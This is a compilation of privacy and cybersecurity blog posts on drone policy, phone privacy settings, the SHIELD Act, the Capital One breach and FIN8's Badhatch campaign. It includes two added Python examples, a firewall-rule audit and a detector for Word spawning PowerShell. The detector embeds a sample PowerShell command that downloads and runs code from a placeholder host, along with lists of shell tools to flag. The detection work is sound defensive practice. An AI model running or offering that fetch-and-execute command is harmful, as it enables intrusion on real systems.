$7.75 Million Grant Awarded to Drone Companies for Drone Traffic Management

Two New York drone companies, AX Enterprize and Thales USA, were awarded a $7.75 million grant from the U.S. Air Force Research Lab to develop state-of-the-art air traffic management (ATM) systems that would allow civilian and military drones to coexist safely alongside manned aircraft in the national airspace. The project and research will be conducted at the Griffiss UAS Test Site in Rome, New York in collaboration with NUAIR, Scherzi Systems LLC and Syracuse University’s Center for Advanced Systems and Engineering and Autonomous Systems Policy Institute.

The goal of this project is to develop a system in which drone pilots can safely detect and avoid other air traffic, and to create a policy approach for data exchange models using high-definition air traffic surveillance and ground-based sense-and-avoid radar technology. This project and the research and results it yields will hopefully be a huge step forward for implementing drones safely and effectively in the national airspace.

Privacy Tip #202 – Check the Privacy Settings on Your Phone Frequently

I once again had the pleasure of presenting Cybersecurity for Tax Professionals at the IRS Nationwide Tax Forum today. The conference is designed for tax professionals in small- to medium-sized businesses. It is always a lively bunch, but following the afternoon session, a crowd of folks got in line to chat more, and they were most interested in my discussion of the privacy settings on their phones and how to find out which apps they have allowed to access their camera, microphone, location services, fitness tracking, Bluetooth, etc.

Mind you, they were interested in learning more, despite the fact that I was between them and the cocktail hour in New Orleans.

While chatting with them about how to check their privacy settings and which apps they have granted access to these capabilities, one man mentioned that he didn’t understand why or how his privacy settings appear to reset after a period of time to allow access again.

This point is an important one, and it gave me the idea for the Privacy Tip this week. Why do our privacy settings revert to previously selected or default settings when we haven’t changed them? This has happened to me, and I am suspicious about how and why it happens. I have considered two possibilities.

Perhaps we used an app and needed to turn the access back on in order to do so, and then forgot to turn it off. That is certainly plausible. But there have also been times when I have turned my phone off, and my privacy settings mysteriously have reverted to their default settings, and I have had to change them all back to not allowing access. Or perhaps when we are asked by the manufacturer to install a new version of the operating system, in order to patch vulnerabilities, the privacy settings automatically revert to default settings.

The tip for this week is to check your privacy settings frequently and reset them. If you install a new version of the operating system, as soon as you unlock the phone after the update, go into privacy settings and reset them. Do the same on your smart TVs and other IoT devices. Check your privacy settings frequently so that if, for whatever reason, they have reverted to the default settings, you can affirmatively choose who you want to have access to your camera, location, microphone and contacts.

Utah to Test Blockchain Voting Through Mobile Apps

As we head toward 2020, expect significant public debate relating to smartphone applications designed to increase turnout and participation in upcoming elections. The Democratic Party has dipped its toe in the water, announcing in July plans to allow telephone voting in lieu of appearing for neighborhood caucus meetings in the key early primary states of Iowa and Nevada.

Given concerns regarding the security and reliability of submitting votes over the internet, jurisdictions around the country have begun to test solutions involving blockchain technology to allow absentee voters to submit ballots. Following initial pilot programs in Denver and West Virginia, Utah County, Utah will be the next jurisdiction to utilize a blockchain-based mobile application in connection with its upcoming municipal primary and general elections.

The pilot program, which will utilize the mobile voting application “Voatz”, will allow active duty military, their eligible dependents, and overseas voters to cast absentee ballots. Eligible voters will need to apply for an absentee ballot with the county clerk and then download the mobile application. The ballot itself will be unlocked using the smartphone’s biometric data (i.e., a fingerprint or facial recognition) and then will be distributed into the blockchain framework for tabulation.

Louisiana Governor Declares Statewide Emergency After Cyber-Attacks Against School Systems

Louisiana Governor John Bel Edwards, for the first time in history, declared a statewide cybersecurity emergency last week, following cyber-attacks against several school systems in the state.

By declaring a cybersecurity emergency, the state is able to garner needed resources, including cybersecurity experts from the Louisiana National Guard, State Police, the Office of Technology Services, the Governor’s Office of Homeland Security and Emergency Preparedness, Louisiana State University, and others, to assist school systems in Sabine, Morehouse and Ouachita parishes that were compromised by malware attacks.

According to the Governor’s office, although these resources are working on the incident, the threat is ongoing. The Governor established a statewide Cyber Security Commission in 2017 and stated that these incidents against school systems in the State are the reason the Commission was established.

Several states, but not all, have established Cyber Security Commissions or similar public-private partnerships in order to prepare for and respond to cyber-attacks that affect state resources. Setting up the Commission in advance of attacks like the ones that occurred in Louisiana will assist states in responding quickly to these attacks and provide appropriate resources and help to those affected.

New York Governor Signs Bill Expanding Data Breach Notification Law

New York Governor Andrew M. Cuomo signed a bill into law last week that expands New York’s data breach notification law. The Stop Hacks and Improve Electronic Data Security (SHIELD) Act brings the New York data breach notification law on par with other state data breach notification laws that have been amended in the last year or so.

The SHIELD Act expands the definition of personal information to include biometric information as well as email addresses in combination with a password or security questions and answers. The law also expands the definition of a data breach to include unauthorized access to personal information, in addition to an unauthorized use or disclosure.

The law now applies to any person or company that owns or licenses personal information of a New York resident, not just entities conducting business in the state.

The law allows a company to conduct a risk-of-harm analysis in the event of an inadvertent disclosure, which must be documented in writing. Notice to individuals is not required if that assessment concludes that the access or disclosure will not likely result in misuse of the data, or in financial or emotional harm to the affected individuals. If the incident involves more than 500 New York residents, the written determination must be provided to the New York Attorney General within 10 days of the determination. If an entity fails to provide required notice, the law increases civil penalties to the greater of $5,000 or $20 per failed notification, with a cap of $250,000.

Finally, the law includes data security requirements that companies must put in place, consistent with other state laws. Companies must implement and maintain administrative, technical and physical safeguards to protect and dispose of personal information. This is similar to the requirements of Massachusetts, Rhode Island and Oregon, which require businesses to have a Written Information Security Program, also known as a WISP, to be in place.

The security requirements go into effect on March 21, 2020, with the rest of the provisions taking effect on October 23, 2019. It is a good time to determine whether your business has a WISP in place and to implement one if not.

Pay Attention to Your Firewalls

After the Capital One data breach, which was reportedly caused by an improperly configured firewall, every company should be paying attention to its firewalls.

This is not the first data breach that has occurred because a firewall was not properly in place for data stored in the Cloud. I’m a lawyer, and I know very little about the technical components of a firewall, but I do know how important they are for protecting the perimeter of your network, and that a firewall is a critical part of a security program meant to protect data.

When we do post-mortems after security incidents and data breaches, there are always lessons to be learned and ways to improve one’s security posture. Let’s all learn from the Capital One incident and pay attention and check our firewalls as a short-term priority.

Eerily, this type of breach was predicted earlier this year by Security Metrics in its publication Security Trends: Data Breach Statistics From 2018 and Predictions for 2019, which predicted that data stored in the Cloud would be breached. It also reported that a top organizational vulnerability is the firewall, and that an improperly configured firewall is “most common.” Check out Security Metrics’ take on trends and predictions here.

To read more about common firewall configuration mistakes, check out this article by our friends at Dark Reading. And remember it’s the beginning of a new month. Make August “Firewalls Priority Month.”
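Paying attention to a firewall means reading its rules, and the defects that turn up in post-mortems are usually mechanical: an allow-all rule nobody removed, an administrative port open to 0.0.0.0/0, a "temporary" exception that became permanent. As an added example (not code from the original post, and not a description of the Capital One configuration, which the post does not detail), the Python below audits a constructed inbound rule set modelled on a cloud security group and flags those patterns. The rules, port lists and prefix-length thresholds are assumptions chosen for illustration; adapt them to your own environment.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    """One inbound allow rule. from_port == -1 means every port (and, with
    protocol "all", every protocol), which is how cloud consoles express
    an 'all traffic' rule."""
    protocol: str        # "tcp", "udp" or "all"
    from_port: int
    to_port: int
    source: str          # CIDR the rule admits
    description: str = ""


# Ports expected to face the internet on a public web tier (assumption).
PUBLIC_SERVICE_PORTS = {80, 443}
# Management and data-store ports that should never be world-reachable (assumption).
ADMIN_PORTS = {22, 3389, 5985, 5986, 1433, 3306, 5432, 6379, 9200, 27017}

# Constructed sample rule set for illustration; not taken from any real environment.
SAMPLE_RULES = [
    Rule("tcp", 443, 443, "0.0.0.0/0", "public HTTPS"),
    Rule("tcp", 80, 80, "0.0.0.0/0", "HTTP redirect to HTTPS"),
    Rule("tcp", 22, 22, "0.0.0.0/0", "temporary SSH for troubleshooting"),
    Rule("tcp", 5432, 5432, "10.0.0.0/8", "Postgres from anywhere in the VPC"),
    Rule("all", -1, -1, "0.0.0.0/0", "legacy allow-all"),
    Rule("tcp", 3389, 3389, "203.0.113.0/24", "RDP from the office range"),
    Rule("tcp", 8080, 8080, "::/0", "admin console, IPv6"),
]


def audit(rules):
    """Return a (rule, severity, message) tuple for every rule matching a risky pattern."""
    findings = []
    for r in rules:
        net = ipaddress.ip_network(r.source, strict=False)
        world = net.prefixlen == 0                             # 0.0.0.0/0 or ::/0
        wide = net.prefixlen < (24 if net.version == 4 else 64)  # threshold is an assumption
        if r.protocol == "all" or r.from_port == -1:
            if world:
                findings.append((r, "CRITICAL", "all traffic admitted from anywhere"))
            else:
                findings.append((r, "HIGH", f"all traffic admitted from {r.source}"))
            continue
        ports = set(range(r.from_port, r.to_port + 1))
        admin = sorted(ports & ADMIN_PORTS)
        if world and admin:
            findings.append((r, "CRITICAL", f"admin port(s) {admin} open to the world"))
        elif world and not ports <= PUBLIC_SERVICE_PORTS:
            findings.append((r, "HIGH", f"non-web port(s) {r.from_port}-{r.to_port} open to the world"))
        elif wide and admin:
            findings.append((r, "MEDIUM", f"admin port(s) {admin} reachable from the wide range {r.source}"))
    return findings


def worst_severity(findings):
    """Highest severity present in a findings list, or None when there are none."""
    order = {"CRITICAL": 3, "HIGH": 2, "MEDIUM": 1}
    return max((f[1] for f in findings), key=order.get, default=None)


if __name__ == "__main__":
    for rule, sev, msg in audit(SAMPLE_RULES):
        print(f"{sev:8} {rule.protocol}/{rule.from_port}-{rule.to_port} "
              f"from {rule.source}: {msg} ({rule.description})")
```

The same three questions (is the source the whole internet, is the port an administrative one, is the range wider than the people who need it) apply equally to host firewalls and on-premises perimeter devices; only the rule export format changes.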

FAA Expands Drone Operations for Recreational Operators

As of July 23, 2019, the Federal Aviation Administration (FAA) expanded the Low Altitude Authorization and Notification Capability (LAANC) system to include recreational operators. LAANC is a system built as a collaboration between the FAA and industry stakeholders to help expedite the time it takes to receive authorization to fly a drone under 400 feet in controlled airspace.

LAANC gives air traffic professionals more visibility into where authorized drones are flying near airports and increases safe operation in the national airspace. This expansion gives more drone pilots access to controlled airspace and allows them to operate there more efficiently and safely.

For updates and more information on LAANC, click here.

OSHA’s Drone Initiative

The Occupational Safety and Health Administration’s (OSHA) drone initiative has taken off. What does that mean for your company? Currently, OSHA can only use drones for inspection activities with permission from employers. However, that could leave you in an uncomfortable position if you deny OSHA’s request to use a drone for its inspection. How should you then handle it? If an employer allows OSHA to use drones for its inspection, the employer should be involved from the very beginning –the employer should assist with the development of the flight plan, designate the visual observer, and get a written agreement from OSHA that all data and photographs collected by the drone will be shared with the company.

In 2018, OSHA used drones with cameras to conduct at least nine inspections of employer facilities, mainly in conditions that were otherwise dangerous for the inspector. The use of drones for this purpose has continued this year, and the use of drones for these OSHA inspections will likely continue to increase, which will raise some novel issues for employers.

Privacy Tip #201 – Capital One Suffers Massive Data Breach

Many readers have reached out to learn about the Capital One data breach and how it affects us. If you haven’t been watching the story unfold as closely as I have, here is a summary of what happened, what information was included, and what to do about it.

Capital One announced on July 29 that a hacker gained access to the personal information of approximately 106 million credit card holders and applicants, which was stored with a cloud provider. The data included some 140,000 Social Security numbers, about 1 million Canadian Social Insurance numbers, and 80,000 bank account numbers; the largest category of information accessed was that of “consumers and small businesses as of the time they applied for one of our credit card products from 2005 through early 2019,” according to Capital One. The access was allegedly through an improperly configured firewall.

The consumers and small businesses information accessed through this data breach included names, addresses, telephone numbers, dates of birth, reported income, credit scores, credit limits, balances, payment history, and email addresses.

The company is offering free credit monitoring and identity protection services for those affected. The problem that I am hearing from readers is, unless you have a Capital One credit card right now, how do you remember if you had one in the past, or if you ever filled out an application (since 2005), or if Capital One had your data as a result of data sharing that is allowed by the Gramm-Leach-Bliley Act?

For those of you who have a Capital One credit card, you should assume that your information was breached and take appropriate precautions, including putting a credit freeze on your credit file with each of the credit bureaus, closing your credit card account, and watching your statements closely, to name a few. For those of you who aren’t sure, the same measures are good cyber-hygiene to protect yourself from fraud or identity theft.

Capital One has been sued in class action lawsuits and is the subject of several State Attorneys General investigations. The Department of Justice has arrested a suspect in Seattle.

FIN8 Back in Business Stealing Credit Card Information with Badhatch

Security research firm Gigamon has reported that the nasty cybercriminal group FIN8 may have reappeared in June after a two-year silence. FIN8 is known for deploying malware on point-of-sale (POS) systems to steal credit card information and selling it on the dark web.

FIN8 appears to be back in business with a new twist on its old scheme. Dubbed “Badhatch,” the campaign starts with customized phishing emails that deliver a malicious Microsoft Word document. The document carries macros that the user is asked to enable; once enabled, the embedded PowerShell scripts run and install a backdoor that gives FIN8 control over the user’s system and a channel for distributing further tools, including credit card scraping malware that steals the details of cards swiped through POS systems.
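The chain described above (phishing lure, macro-enabled Word document, PowerShell, backdoor) leaves a characteristic trace in endpoint telemetry: an Office application spawning PowerShell, frequently with a hidden window and a base64-encoded command line. The Python below is an added example, not code from the Gigamon research or the original post. It runs a simple detection over constructed process-creation events shaped like Sysmon Event ID 1 fields and decodes the -EncodedCommand payload so an analyst can read what the stager would run. The field names, paths and the placeholder URL are assumptions for the sample, not FIN8 indicators.

```python
import base64
import re

# Constructed sample: a plaintext PowerShell stager, encoded the way
# `powershell -EncodedCommand` expects (base64 over UTF-16LE). It is built
# here rather than pasted so the sample stays self-consistent. The URL is a
# placeholder, not a real indicator.
STAGER_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
STAGER_B64 = base64.b64encode(STAGER_PLAINTEXT.encode("utf-16le")).decode("ascii")

OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation events using Sysmon Event ID 1 field names (assumption).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": OFFICE + r"\WINWORD.EXE",
     "CommandLine": f'"{OFFICE}\\WINWORD.EXE" /n "C:\\Users\\jdoe\\Downloads\\invoice.docm"'},
    {"ParentImage": OFFICE + r"\WINWORD.EXE",
     "Image": PS,
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {STAGER_B64}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": PS,
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]+)")
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decoded -EncodedCommand payload, or None if absent or not valid UTF-16LE base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Reasons this process-creation event looks like the macro-to-PowerShell chain."""
    reasons = []
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_APPS and child in SHELLS:
        reasons.append(f"{parent} spawned {child}")
    if child in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append(f"encoded command: {decoded}")
        if HIDDEN_RE.search(cmd):
            reasons.append("hidden window")
    return reasons


def find_suspicious(events):
    """All events with at least one reason, paired with their reasons."""
    return [(ev, evaluate(ev)) for ev in events if evaluate(ev)]


if __name__ == "__main__":
    for ev, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"{basename(ev['Image'])} <- {basename(ev['ParentImage'])}")
        for r in reasons:
            print("   ", r)
```

Parent-child pairing is the durable signal here: the lure document, the encoding flags and the download URL all change between campaigns, but a Word process has very few legitimate reasons to start a shell.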

The researchers at Gigamon have outlined Badhatch from a technical standpoint, which is helpful for security folks.

Luckily, according to Gigamon, “[A]t the end of the day, the actors behind FIN8 are human and clearly fallible. While they may make rapid improvements to tools and procedures, we hope the technical and operational information shared here will help other organizations detect and disrupt FIN8 operations.”

Badhatch is designed to steal credit card information, and our experience has seen a dramatic rise in credit card scraping schemes. Those in the retail space may wish to consider taking a look at the research from Gigamon and being on the look-out for Badhatch.